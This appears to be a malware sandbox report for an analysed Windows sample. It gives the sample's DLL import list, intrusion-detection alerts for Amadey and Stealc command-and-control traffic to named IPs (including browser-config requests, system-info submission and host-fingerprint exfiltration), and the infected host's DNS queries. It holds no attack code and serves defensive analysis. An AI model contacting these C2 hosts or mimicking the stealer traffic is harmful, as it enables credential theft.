KERNEL32.dll	SetEndOfFile, LocalCompact, GetModuleHandleW, GetTickCount, CreateNamedPipeW, GetProcessHeap, GetConsoleAliasesA, GetConsoleCP, GlobalAlloc, GetSystemDirectoryW, SetFileShortNameW, LoadLibraryW, IsProcessInJob, FatalAppExitW, AssignProcessToJobObject, IsBadCodePtr, ReplaceFileW, GetModuleFileNameW, GlobalUnlock, CreateJobObjectA, GetLastError, GetProcAddress, WriteConsoleInputW, VerLanguageNameW, LoadLibraryA, SetConsoleCtrlHandler, AddAtomW, HeapWalk, EnumResourceTypesW, SetEnvironmentVariableA, GetOEMCP, EnumDateFormatsA, EnumResourceNamesA, GetFileTime, SetProcessShutdownParameters, GetDiskFreeSpaceExW, LCMapStringW, CreateFileW, HeapSize, FlushFileBuffers, FindVolumeClose, PeekConsoleInputW, CreateFileA, HeapReAlloc, GetStringTypeW, HeapFree, GetCommandLineW, HeapSetInformation, GetStartupInfoW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapAlloc, HeapCreate, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, ReadFile, MultiByteToWideChar, ExitProcess, SetFilePointer, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetConsoleMode, GetCPInfo, GetACP, IsValidCodePage, Sleep, RtlUnwind, SetStdHandle, IsProcessorFeaturePresent, WriteConsoleW, CloseHandle
USER32.dll	SetCaretPos, CharUpperBuffW, GetMessageExtraInfo, GetMenu, DrawStateW, GetSysColorBrush
GDI32.dll	GetCharWidthI, GetCharABCWidthsI
WINHTTP.dll	WinHttpOpen

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T10:36:28.945163+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49722	80	192.168.2.6	185.215.113.16
2024-07-26T10:40:15.997410+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49689	80	192.168.2.6	185.215.113.19
2024-07-26T10:45:04.139878+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	54107	80	192.168.2.6	185.215.113.16
2024-07-26T10:40:53.597971+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49794	80	192.168.2.6	185.215.113.19
2024-07-26T10:40:35.969873+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49750	80	192.168.2.6	185.215.113.16
2024-07-26T10:39:33.401016+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	59070	80	192.168.2.6	185.215.113.19
2024-07-26T10:43:45.373991+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50201	80	192.168.2.6	185.215.113.19
2024-07-26T10:41:35.531310+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49896	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:14.449386+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:40:41.406472+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49763	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:13.707636+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:38:33.839160+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	58917	80	192.168.2.6	185.215.113.16
2024-07-26T10:40:18.545943+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49695	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:06.185006+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:40:51.934379+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49790	80	192.168.2.6	185.215.113.19
2024-07-26T10:43:09.755442+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50120	80	192.168.2.6	185.215.113.16
2024-07-26T10:43:11.478970+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50124	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:16.604259+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:37:09.228419+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49761	80	192.168.2.6	185.215.113.16
2024-07-26T10:39:22.451400+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	59042	80	192.168.2.6	185.215.113.16
2024-07-26T10:42:18.976096+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49994	80	192.168.2.6	185.215.113.16
2024-07-26T10:37:06.465314+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49756	185.215.113.16	192.168.2.6
2024-07-26T10:45:09.280180+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	54120	80	192.168.2.6	185.215.113.16
2024-07-26T10:40:49.858025+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49785	80	192.168.2.6	185.215.113.16
2024-07-26T10:42:08.724565+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49971	80	192.168.2.6	185.215.113.16
2024-07-26T10:44:37.882115+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	54048	80	192.168.2.6	185.215.113.19
2024-07-26T10:42:01.263565+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49958	80	192.168.2.6	185.215.113.19
2024-07-26T10:45:06.502607+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	54112	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:21.092573+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49714	40.68.123.157	192.168.2.6
2024-07-26T10:39:49.647476+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49620	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:18.867169+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49713	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:07.768923+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:37:24.123508+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49814	80	192.168.2.6	85.28.47.31
2024-07-26T10:39:48.220327+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49617	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:39.620139+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49731	80	192.168.2.6	185.215.113.16
2024-07-26T10:37:39.657525+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49896	80	192.168.2.6	85.28.47.31
2024-07-26T10:43:52.822165+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50218	80	192.168.2.6	185.215.113.19
2024-07-26T10:39:23.194539+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	59043	80	192.168.2.6	185.215.113.19
2024-07-26T10:37:11.921778+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	49765	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:12.420334+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:38:58.038556+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	58980	80	192.168.2.6	185.215.113.19
2024-07-26T10:38:50.302535+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	58962	80	192.168.2.6	185.215.113.16
2024-07-26T10:39:06.532191+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	58999	80	192.168.2.6	185.215.113.19
2024-07-26T10:41:42.436207+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49911	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:08.298123+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:44:19.026889+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50281	80	192.168.2.6	185.215.113.16
2024-07-26T10:44:08.929600+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50258	80	192.168.2.6	185.215.113.19
2024-07-26T10:40:05.993986+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49660	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:13.708114+0200	TCP	2002725	ET ACTIVEX COM Object Instantiation Memory Corruption Vulnerability MS05-054	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:36:14.220781+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:39:29.876814+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	59060	80	192.168.2.6	185.215.113.19
2024-07-26T10:41:55.145993+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49942	80	192.168.2.6	185.215.113.19
2024-07-26T10:39:56.763657+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49638	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:15.778574+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:40:56.965445+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49803	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:06.383011+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:37:06.127352+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49756	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:06.191587+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:36:07.830485+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:36:21.193915+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49713	80	192.168.2.6	185.215.113.16
2024-07-26T10:37:26.912948+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	49831	142.250.185.227	192.168.2.6
2024-07-26T10:45:07.641512+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	54115	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:13.939244+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:40:11.543778+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49679	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:08.520845+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:40:39.667818+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49759	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:07.922244+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:36:59.002265+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49749	40.68.123.157	192.168.2.6
2024-07-26T10:41:36.709634+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49898	80	192.168.2.6	185.215.113.19
2024-07-26T10:40:44.865322+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49773	80	192.168.2.6	185.215.113.19
2024-07-26T10:41:25.207366+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49871	80	192.168.2.6	185.215.113.19
2024-07-26T10:38:25.332987+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	58896	80	192.168.2.6	185.215.113.16
2024-07-26T10:37:07.352326+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	80	49754	185.215.113.19	192.168.2.6
2024-07-26T10:45:20.222876+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	53410	80	192.168.2.6	185.215.113.19
2024-07-26T10:40:25.515140+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49722	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:31.409132+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49725	80	192.168.2.6	185.215.113.16
2024-07-26T10:39:24.860339+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	59048	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:13.525527+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:39:59.226306+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49643	80	192.168.2.6	185.215.113.16
2024-07-26T10:38:21.880823+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	58887	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:07.250135+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:36:05.998598+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:44:19.028368+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50282	80	192.168.2.6	185.215.113.19
2024-07-26T10:40:00.895026+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49648	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:06.373775+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:36:13.319043+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:37:08.133295+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	49759	80	192.168.2.6	185.215.113.19
2024-07-26T10:39:31.653267+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	59066	80	192.168.2.6	185.215.113.19
2024-07-26T10:41:48.444565+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49926	80	192.168.2.6	185.215.113.19
2024-07-26T10:36:07.916878+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:40:13.431081+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49683	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:16.213875+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49710	80	192.168.2.6	85.28.47.31
2024-07-26T10:36:08.015099+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49710	85.28.47.31	192.168.2.6
2024-07-26T10:43:33.092496+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50172	80	192.168.2.6	185.215.113.19
2024-07-26T10:43:13.629699+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	50129	80	192.168.2.6	185.215.113.19
2024-07-26T10:39:00.757431+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	58986	80	192.168.2.6	185.215.113.16
2024-07-26T10:37:09.590562+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49762	80	192.168.2.6	85.28.47.31
2024-07-26T10:40:48.192873+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49781	80	192.168.2.6	185.215.113.16
2024-07-26T10:36:07.921580+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49710	85.28.47.31	192.168.2.6

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 10:37:14.326273918 CEST	192.168.2.6	1.1.1.1	0xe0e5	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:14.326474905 CEST	192.168.2.6	1.1.1.1	0xc6a4	Standard query (0)	www.youtube.com	65	IN (0x0001)	false
Jul 26, 2024 10:37:14.823673010 CEST	192.168.2.6	1.1.1.1	0xcfeb	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:14.823888063 CEST	192.168.2.6	1.1.1.1	0xc30b	Standard query (0)	www.youtube.com	65	IN (0x0001)	false
Jul 26, 2024 10:37:15.890615940 CEST	192.168.2.6	1.1.1.1	0xcd07	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:15.891004086 CEST	192.168.2.6	1.1.1.1	0x6489	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jul 26, 2024 10:37:17.744469881 CEST	192.168.2.6	1.1.1.1	0x308b	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:17.744632006 CEST	192.168.2.6	1.1.1.1	0x27b6	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 10:37:17.744869947 CEST	192.168.2.6	1.1.1.1	0xfe90	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:17.744983912 CEST	192.168.2.6	1.1.1.1	0x6b21	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 10:37:17.925086975 CEST	192.168.2.6	1.1.1.1	0x8cb	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:17.925318956 CEST	192.168.2.6	1.1.1.1	0x6bb9	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 10:37:22.542531967 CEST	192.168.2.6	1.1.1.1	0x1c59	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:22.593080044 CEST	192.168.2.6	1.1.1.1	0x74f1	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:22.616498947 CEST	192.168.2.6	1.1.1.1	0x548b	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:24.211709976 CEST	192.168.2.6	1.1.1.1	0xbde4	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:24.220199108 CEST	192.168.2.6	1.1.1.1	0x8b07	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:24.534773111 CEST	192.168.2.6	1.1.1.1	0xd411	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:25.398263931 CEST	192.168.2.6	1.1.1.1	0xc975	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:25.407867908 CEST	192.168.2.6	1.1.1.1	0x7ea9	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:29.353034019 CEST	192.168.2.6	1.1.1.1	0x5be4	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:29.362842083 CEST	192.168.2.6	1.1.1.1	0x668e	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:29.397409916 CEST	192.168.2.6	1.1.1.1	0x3138	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Jul 26, 2024 10:37:29.654876947 CEST	192.168.2.6	1.1.1.1	0x643b	Standard query (0)	accounts.youtube.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:29.655703068 CEST	192.168.2.6	1.1.1.1	0xa405	Standard query (0)	accounts.youtube.com	65	IN (0x0001)	false
Jul 26, 2024 10:37:32.954617023 CEST	192.168.2.6	1.1.1.1	0x7441	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:32.999068022 CEST	192.168.2.6	1.1.1.1	0xbfc6	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:33.010454893 CEST	192.168.2.6	1.1.1.1	0x86de	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 10:37:38.019593000 CEST	192.168.2.6	1.1.1.1	0xb8a6	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:38.034521103 CEST	192.168.2.6	1.1.1.1	0x236a	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:38.050239086 CEST	192.168.2.6	1.1.1.1	0xd67f	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:40.178746939 CEST	192.168.2.6	1.1.1.1	0xc982	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:40.214257956 CEST	192.168.2.6	1.1.1.1	0x67c0	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:42.056364059 CEST	192.168.2.6	1.1.1.1	0x920c	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:47.829513073 CEST	192.168.2.6	1.1.1.1	0xcd9f	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:48.011481047 CEST	192.168.2.6	1.1.1.1	0xbf4c	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:48.022634983 CEST	192.168.2.6	1.1.1.1	0x7593	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:48.450717926 CEST	192.168.2.6	1.1.1.1	0x3dc8	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:48.450870037 CEST	192.168.2.6	1.1.1.1	0xa670	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jul 26, 2024 10:37:55.978686094 CEST	192.168.2.6	1.1.1.1	0xdf6a	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:55.979010105 CEST	192.168.2.6	1.1.1.1	0x628b	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:55.979847908 CEST	192.168.2.6	1.1.1.1	0x3e94	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:56.195753098 CEST	192.168.2.6	1.1.1.1	0xb989	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:56.196448088 CEST	192.168.2.6	1.1.1.1	0x3a81	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:56.197382927 CEST	192.168.2.6	1.1.1.1	0x4493	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:56.204705954 CEST	192.168.2.6	1.1.1.1	0x2ff0	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Jul 26, 2024 10:37:56.205446959 CEST	192.168.2.6	1.1.1.1	0x1229	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:56.205683947 CEST	192.168.2.6	1.1.1.1	0xc8db	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Jul 26, 2024 10:37:56.213001013 CEST	192.168.2.6	1.1.1.1	0x7e0c	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:56.229751110 CEST	192.168.2.6	1.1.1.1	0xa943	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:56.238270998 CEST	192.168.2.6	1.1.1.1	0x3e8	Standard query (0)	twitter.com	28	IN (0x0001)	false
Jul 26, 2024 10:37:57.708555937 CEST	192.168.2.6	1.1.1.1	0x3840	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:57.717011929 CEST	192.168.2.6	1.1.1.1	0x6cb0	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:57.725675106 CEST	192.168.2.6	1.1.1.1	0x6fda	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:57.849375010 CEST	192.168.2.6	1.1.1.1	0x6adf	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:59.631937027 CEST	192.168.2.6	1.1.1.1	0xe9eb	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:59.637887001 CEST	192.168.2.6	1.1.1.1	0xc285	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:37:59.640057087 CEST	192.168.2.6	1.1.1.1	0x8cf6	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:37:59.649837017 CEST	192.168.2.6	1.1.1.1	0x2da8	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 10:37:59.797684908 CEST	192.168.2.6	1.1.1.1	0x23f3	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:00.468005896 CEST	192.168.2.6	1.1.1.1	0x9d2d	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:00.485186100 CEST	192.168.2.6	1.1.1.1	0x5757	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:00.532582998 CEST	192.168.2.6	1.1.1.1	0x5757	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:00.555107117 CEST	192.168.2.6	1.1.1.1	0x1f9e	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Jul 26, 2024 10:38:06.993088007 CEST	192.168.2.6	1.1.1.1	0xf876	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 10:38:11.670329094 CEST	192.168.2.6	1.1.1.1	0xd155	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:18.239609003 CEST	192.168.2.6	1.1.1.1	0xac4a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:18.239722013 CEST	192.168.2.6	1.1.1.1	0x2e35	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 26, 2024 10:38:19.730735064 CEST	192.168.2.6	1.1.1.1	0x2c31	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 10:38:20.275643110 CEST	192.168.2.6	1.1.1.1	0xddad	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:22.755315065 CEST	192.168.2.6	1.1.1.1	0x4f61	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:43.907835007 CEST	192.168.2.6	1.1.1.1	0x7005	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:38:44.446053982 CEST	192.168.2.6	1.1.1.1	0xdb21	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:39:03.641141891 CEST	192.168.2.6	1.1.1.1	0xa4f7	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:39:03.650435925 CEST	192.168.2.6	1.1.1.1	0xcf37	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 10:39:03.658930063 CEST	192.168.2.6	1.1.1.1	0x8f01	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 10:39:17.131378889 CEST	192.168.2.6	1.1.1.1	0x13ca	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
